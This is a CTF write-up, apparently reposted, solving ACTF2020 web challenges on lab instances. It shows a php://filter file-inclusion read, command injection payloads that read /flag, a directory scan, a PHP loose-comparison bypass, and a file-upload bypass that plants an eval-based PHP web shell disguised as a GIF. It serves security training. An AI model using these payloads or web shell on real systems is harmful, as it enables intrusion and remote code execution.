2
ACTF2020刷题
source link: https://sunny250.github.io/2020/04/26/ACTF%E5%88%B7%E9%A2%982020/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Include
简单为协议包含
?file=php://filter/convert.base64-encode/resource=flag.php 然后base64解密
echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}
没有进行过滤处理,考的是linux的知识点。一行linux语句如何执行多条linux语句。使用&&
连接,或者分号;
隔开。也可以使用管道符号|
但是在此处只能使用|和分号。(不太清楚)
payload
127.0.0.1 | cat /flag
或者
127.0.0.1;cat /flag
BackupFile
扫描目录发现备份文件
sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt
-----------------
GENERATED WORDS: 53
---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)
-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2
访问index.php.bak得到源码
<?php
include_once "flag.php";
if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}
若类型比较会先转换,字符串于整型对比,都会转换成整型。
输入key=123即可
Upload
打开题目是一个灯,鼠标移动到灯泡之后可以看见一个上传界面
直接上传1.php发现被禁止,尝试掐后缀,发现phtml可以
POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif
GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"
upload
-----------------------------380150826415384369013004740571--
然后得到上传地址,使用蚁剑连接,拿flag
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK